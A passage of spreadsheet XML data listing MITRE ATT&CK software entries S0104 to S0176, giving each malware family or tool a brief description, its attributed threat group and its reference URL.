    <t>S0104</t>
  </si>
  <si>
    <t>netstat</t>
  </si>
  <si>
    <t>[netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0104</t>
  </si>
  <si>
    <t>S0105</t>
  </si>
  <si>
    <t>dsquery</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0105</t>
  </si>
  <si>
    <t>S0106</t>
  </si>
  <si>
    <t>cmd</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)
Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., &lt;code&gt;dir&lt;/code&gt; (Citation: TechNet Dir)), deleting files (e.g., &lt;code&gt;del&lt;/code&gt; (Citation: TechNet Del)), and copying files (e.g., &lt;code&gt;copy&lt;/code&gt; (Citation: TechNet Copy)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0106</t>
  </si>
  <si>
    <t>S0107</t>
  </si>
  <si>
    <t>Cherry Picker</t>
  </si>
  <si>
    <t>[Cherry Picker](https://attack.mitre.org/software/S0107) is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0107</t>
  </si>
  <si>
    <t>S0108</t>
  </si>
  <si>
    <t>netsh</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) is a scripting utility used to interact with networking components on local or remote systems. (Citation: TechNet Netsh)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0108</t>
  </si>
  <si>
    <t>S0109</t>
  </si>
  <si>
    <t>WEBC2</t>
  </si>
  <si>
    <t>[WEBC2](https://attack.mitre.org/software/S0109) is a backdoor used by [APT1](https://attack.mitre.org/groups/G0006) to retrieve a Web page from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0109</t>
  </si>
  <si>
    <t>S0110</t>
  </si>
  <si>
    <t>at</t>
  </si>
  <si>
    <t>[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time. (Citation: TechNet At)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0110</t>
  </si>
  <si>
    <t>S0111</t>
  </si>
  <si>
    <t>schtasks</t>
  </si>
  <si>
    <t>[schtasks](https://attack.mitre.org/software/S0111) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0111</t>
  </si>
  <si>
    <t>S0112</t>
  </si>
  <si>
    <t>ROCKBOOT</t>
  </si>
  <si>
    <t>[ROCKBOOT](https://attack.mitre.org/software/S0112) is a [Bootkit](https://attack.mitre.org/techniques/T1067) that has been used by an unidentified, suspected China-based group. (Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0112</t>
  </si>
  <si>
    <t>S0113</t>
  </si>
  <si>
    <t>Prikormka</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. (Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0113</t>
  </si>
  <si>
    <t>S0114</t>
  </si>
  <si>
    <t>BOOTRASH</t>
  </si>
  <si>
    <t>[BOOTRASH](https://attack.mitre.org/software/S0114) is a [Bootkit](https://attack.mitre.org/techniques/T1067) that targets Windows operating systems. It has been used by threat actors that target the financial sector. (Citation: MTrends 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0114</t>
  </si>
  <si>
    <t>S0115</t>
  </si>
  <si>
    <t>Crimson</t>
  </si>
  <si>
    <t>[Crimson](https://attack.mitre.org/software/S0115) is malware used as part of a campaign known as Operation Transparent Tribe that targeted Indian diplomatic and military victims. (Citation: Proofpoint Operation Transparent Tribe March 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0115</t>
  </si>
  <si>
    <t>S0116</t>
  </si>
  <si>
    <t>UACMe</t>
  </si>
  <si>
    <t>[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0116</t>
  </si>
  <si>
    <t>S0117</t>
  </si>
  <si>
    <t>XTunnel</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://attack.mitre.org/groups/G0007) during the compromise of the Democratic National Committee. (Citation: Crowdstrike DNC June 2016) (Citation: Invincea XTunnel) (Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0117</t>
  </si>
  <si>
    <t>S0118</t>
  </si>
  <si>
    <t>Nidiran</t>
  </si>
  <si>
    <t>[Nidiran](https://attack.mitre.org/software/S0118) is a custom backdoor developed and used by [Suckfly](https://attack.mitre.org/groups/G0039). It has been delivered via strategic web compromise. (Citation: Symantec Suckfly March 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0118</t>
  </si>
  <si>
    <t>S0119</t>
  </si>
  <si>
    <t>Cachedump</t>
  </si>
  <si>
    <t>[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system's registry. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0119</t>
  </si>
  <si>
    <t>S0120</t>
  </si>
  <si>
    <t>Fgdump</t>
  </si>
  <si>
    <t>[Fgdump](https://attack.mitre.org/software/S0120) is a Windows password hash dumper. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0120</t>
  </si>
  <si>
    <t>S0121</t>
  </si>
  <si>
    <t>Lslsass</t>
  </si>
  <si>
    <t>[Lslsass](https://attack.mitre.org/software/S0121) is a publicly-available tool that can dump active logon session password hashes from the lsass process. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0121</t>
  </si>
  <si>
    <t>S0122</t>
  </si>
  <si>
    <t>Pass-The-Hash Toolkit</t>
  </si>
  <si>
    <t>[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0122</t>
  </si>
  <si>
    <t>S0123</t>
  </si>
  <si>
    <t>xCmd</t>
  </si>
  <si>
    <t>[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. (Citation: xCmd)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0123</t>
  </si>
  <si>
    <t>S0124</t>
  </si>
  <si>
    <t>Pisloader</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://attack.mitre.org/groups/G0026) and is similar to another malware family, [HTTPBrowser](https://attack.mitre.org/software/S0070), that has been used by the group. (Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0124</t>
  </si>
  <si>
    <t>S0125</t>
  </si>
  <si>
    <t>Remsec</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is a modular backdoor that has been used by [Strider](https://attack.mitre.org/groups/G0041) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. (Citation: Symantec Strider Blog)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0125</t>
  </si>
  <si>
    <t>S0126</t>
  </si>
  <si>
    <t>ComRAT</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) is a remote access tool suspected of being a decedent of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Symantec Waterbug) (Citation: NorthSec 2015 GData Uroburos Tools)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0126</t>
  </si>
  <si>
    <t>S0127</t>
  </si>
  <si>
    <t>BBSRAT</t>
  </si>
  <si>
    <t>[BBSRAT](https://attack.mitre.org/software/S0127) is malware with remote access tool functionality that has been used in targeted compromises. (Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0127</t>
  </si>
  <si>
    <t>S0128</t>
  </si>
  <si>
    <t>BADNEWS</t>
  </si>
  <si>
    <t>[BADNEWS](https://attack.mitre.org/software/S0128) is malware that has been used by the actors responsible for the [Patchwork](https://attack.mitre.org/groups/G0040) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. (Citation: Forcepoint Monsoon) (Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0128</t>
  </si>
  <si>
    <t>S0129</t>
  </si>
  <si>
    <t>AutoIt backdoor</t>
  </si>
  <si>
    <t>[AutoIt backdoor](https://attack.mitre.org/software/S0129) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. (Citation: Forcepoint Monsoon) This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0129</t>
  </si>
  <si>
    <t>S0130</t>
  </si>
  <si>
    <t>Unknown Logger</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. (Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0130</t>
  </si>
  <si>
    <t>S0131</t>
  </si>
  <si>
    <t>TINYTYPHON</t>
  </si>
  <si>
    <t>[TINYTYPHON](https://attack.mitre.org/software/S0131) is a backdoor  that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. (Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0131</t>
  </si>
  <si>
    <t>S0132</t>
  </si>
  <si>
    <t>H1N1</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. (Citation: Cisco H1N1 Part 1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0132</t>
  </si>
  <si>
    <t>S0133</t>
  </si>
  <si>
    <t>Miner-C</t>
  </si>
  <si>
    <t>[Miner-C](https://attack.mitre.org/software/S0133) is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. (Citation: Softpedia MinerC)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0133</t>
  </si>
  <si>
    <t>S0134</t>
  </si>
  <si>
    <t>Downdelph</t>
  </si>
  <si>
    <t>[Downdelph](https://attack.mitre.org/software/S0134) is a first-stage downloader written in Delphi that has been used by [APT28](https://attack.mitre.org/groups/G0007) in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0134</t>
  </si>
  <si>
    <t>S0135</t>
  </si>
  <si>
    <t>HIDEDRV</t>
  </si>
  <si>
    <t>[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit used by [APT28](https://attack.mitre.org/groups/G0007). It has been deployed along with [Downdelph](https://attack.mitre.org/software/S0134) to execute and hide that malware. (Citation: ESET Sednit Part 3) (Citation: Sekoia HideDRV Oct 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0135</t>
  </si>
  <si>
    <t>S0136</t>
  </si>
  <si>
    <t>USBStealer</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) is malware that has used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0136</t>
  </si>
  <si>
    <t>S0137</t>
  </si>
  <si>
    <t>CORESHELL</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0137</t>
  </si>
  <si>
    <t>S0138</t>
  </si>
  <si>
    <t>OLDBAIT</t>
  </si>
  <si>
    <t>[OLDBAIT](https://attack.mitre.org/software/S0138) is a credential harvester used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0138</t>
  </si>
  <si>
    <t>S0139</t>
  </si>
  <si>
    <t>PowerDuke</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. (Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0139</t>
  </si>
  <si>
    <t>S0140</t>
  </si>
  <si>
    <t>Shamoon</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0140</t>
  </si>
  <si>
    <t>S0141</t>
  </si>
  <si>
    <t>Winnti</t>
  </si>
  <si>
    <t>[Winnti](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0141</t>
  </si>
  <si>
    <t>S0142</t>
  </si>
  <si>
    <t>StreamEx</t>
  </si>
  <si>
    <t>[StreamEx](https://attack.mitre.org/software/S0142) is a malware family that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. (Citation: Cylance Shell Crew Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0142</t>
  </si>
  <si>
    <t>S0143</t>
  </si>
  <si>
    <t>Flame</t>
  </si>
  <si>
    <t>Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0143</t>
  </si>
  <si>
    <t>S0144</t>
  </si>
  <si>
    <t>ChChes</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) is a Trojan that appears to be used exclusively by [menuPass](https://attack.mitre.org/groups/G0045). It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. (Citation: Palo Alto menuPass Feb 2017) (Citation: JPCERT ChChes Feb 2017) (Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0144</t>
  </si>
  <si>
    <t>S0145</t>
  </si>
  <si>
    <t>POWERSOURCE</t>
  </si>
  <si>
    <t>[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0145</t>
  </si>
  <si>
    <t>S0146</t>
  </si>
  <si>
    <t>TEXTMATE</t>
  </si>
  <si>
    <t>[TEXTMATE](https://attack.mitre.org/software/S0146) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://attack.mitre.org/software/S0145) in February 2017. (Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0146</t>
  </si>
  <si>
    <t>S0147</t>
  </si>
  <si>
    <t>Pteranodon</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) is a custom backdoor used by [Gamaredon Group](https://attack.mitre.org/groups/G0047). (Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0147</t>
  </si>
  <si>
    <t>S0148</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). (Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0148</t>
  </si>
  <si>
    <t>S0149</t>
  </si>
  <si>
    <t>MoonWind</t>
  </si>
  <si>
    <t>[MoonWind](https://attack.mitre.org/software/S0149) is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. (Citation: Palo Alto MoonWind March 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0149</t>
  </si>
  <si>
    <t>S0150</t>
  </si>
  <si>
    <t>POSHSPY</t>
  </si>
  <si>
    <t>[POSHSPY](https://attack.mitre.org/software/S0150) is a backdoor that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. (Citation: FireEye POSHSPY April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0150</t>
  </si>
  <si>
    <t>S0151</t>
  </si>
  <si>
    <t>HALFBAKED</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0151</t>
  </si>
  <si>
    <t>S0152</t>
  </si>
  <si>
    <t>EvilGrab</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) is a malware family with common reconnaissance capabilities. It has been deployed by [menuPass](https://attack.mitre.org/groups/G0045) via malicious Microsoft Office documents as part of spearphishing campaigns. (Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0152</t>
  </si>
  <si>
    <t>S0153</t>
  </si>
  <si>
    <t>RedLeaves</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) is a malware family used by [menuPass](https://attack.mitre.org/groups/G0045). The code overlaps with [PlugX](https://attack.mitre.org/software/S0013) and may be based upon the open source tool Trochilus. (Citation: PWC Cloud Hopper Technical Annex April 2017) (Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0153</t>
  </si>
  <si>
    <t>S0154</t>
  </si>
  <si>
    <t>Cobalt Strike</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, penetration testing tool which bills itself as "adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors". Cobalt Strike's interactive post-exploit capabilities cover the full range of ATT&amp;CK tactics, all executed within a single, integrated system. (Citation: cobaltstrike manual)
In addition to its own capabilities, [Cobalt Strike](https://attack.mitre.org/software/S0154) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://attack.mitre.org/software/S0002). (Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0154</t>
  </si>
  <si>
    <t>S0155</t>
  </si>
  <si>
    <t>WINDSHIELD</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0155</t>
  </si>
  <si>
    <t>S0156</t>
  </si>
  <si>
    <t>KOMPROGO</t>
  </si>
  <si>
    <t>[KOMPROGO](https://attack.mitre.org/software/S0156) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050) that is capable of process, file, and registry management. (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0156</t>
  </si>
  <si>
    <t>S0157</t>
  </si>
  <si>
    <t>SOUNDBITE</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0157</t>
  </si>
  <si>
    <t>S0158</t>
  </si>
  <si>
    <t>PHOREAL</t>
  </si>
  <si>
    <t>[PHOREAL](https://attack.mitre.org/software/S0158) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0158</t>
  </si>
  <si>
    <t>S0159</t>
  </si>
  <si>
    <t>SNUGRIDE</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) as first stage malware. (Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0159</t>
  </si>
  <si>
    <t>S0160</t>
  </si>
  <si>
    <t>certutil</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0160</t>
  </si>
  <si>
    <t>S0161</t>
  </si>
  <si>
    <t>XAgentOSX</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007)  on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0161</t>
  </si>
  <si>
    <t>S0162</t>
  </si>
  <si>
    <t>Komplex</t>
  </si>
  <si>
    <t>[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0162</t>
  </si>
  <si>
    <t>S0163</t>
  </si>
  <si>
    <t>Janicab</t>
  </si>
  <si>
    <t>[Janicab](https://attack.mitre.org/software/S0163) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. (Citation: Janicab)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0163</t>
  </si>
  <si>
    <t>S0164</t>
  </si>
  <si>
    <t>TDTESS</t>
  </si>
  <si>
    <t>[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit .NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0164</t>
  </si>
  <si>
    <t>S0165</t>
  </si>
  <si>
    <t>OSInfo</t>
  </si>
  <si>
    <t>[OSInfo](https://attack.mitre.org/software/S0165) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to do internal discovery on a victim's computer and network. (Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0165</t>
  </si>
  <si>
    <t>S0166</t>
  </si>
  <si>
    <t>RemoteCMD</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to execute commands on a remote system similar to SysInternal's PSEXEC functionality. (Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0166</t>
  </si>
  <si>
    <t>S0167</t>
  </si>
  <si>
    <t>Matroyshka</t>
  </si>
  <si>
    <t>[Matroyshka](https://attack.mitre.org/software/S0167) is a malware framework used by [CopyKittens](https://attack.mitre.org/groups/G0052) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0167</t>
  </si>
  <si>
    <t>S0168</t>
  </si>
  <si>
    <t>Gazer</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) is a backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2016. (Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0168</t>
  </si>
  <si>
    <t>S0169</t>
  </si>
  <si>
    <t>RawPOS</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. (Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: Visa RawPOS March 2015) FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0169</t>
  </si>
  <si>
    <t>S0170</t>
  </si>
  <si>
    <t>Helminth</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) is a backdoor that has at least two variants - one written in VBScript and PowerShell that is delivered via a macros in Excel spreadsheets, and one that is a standalone Windows executable. (Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0170</t>
  </si>
  <si>
    <t>S0171</t>
  </si>
  <si>
    <t>Felismus</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) is a modular backdoor that has been used by [Sowbug](https://attack.mitre.org/groups/G0054). (Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0171</t>
  </si>
  <si>
    <t>S0172</t>
  </si>
  <si>
    <t>Reaver</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of [Control Panel Items](https://attack.mitre.org/techniques/T1196). (Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0172</t>
  </si>
  <si>
    <t>S0173</t>
  </si>
  <si>
    <t>FLIPSIDE</t>
  </si>
  <si>
    <t>[FLIPSIDE](https://attack.mitre.org/software/S0173) is a simple tool similar to Plink that is used by [FIN5](https://attack.mitre.org/groups/G0053) to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0173</t>
  </si>
  <si>
    <t>S0174</t>
  </si>
  <si>
    <t>Responder</t>
  </si>
  <si>
    <t>Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0174</t>
  </si>
  <si>
    <t>S0175</t>
  </si>
  <si>
    <t>meek</t>
  </si>
  <si>
    <t>[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0175</t>
  </si>
  <si>
    <t>S0176</t>
  </si>
  <si>
    <t>Wingbird</t>
  </si>
  <si>
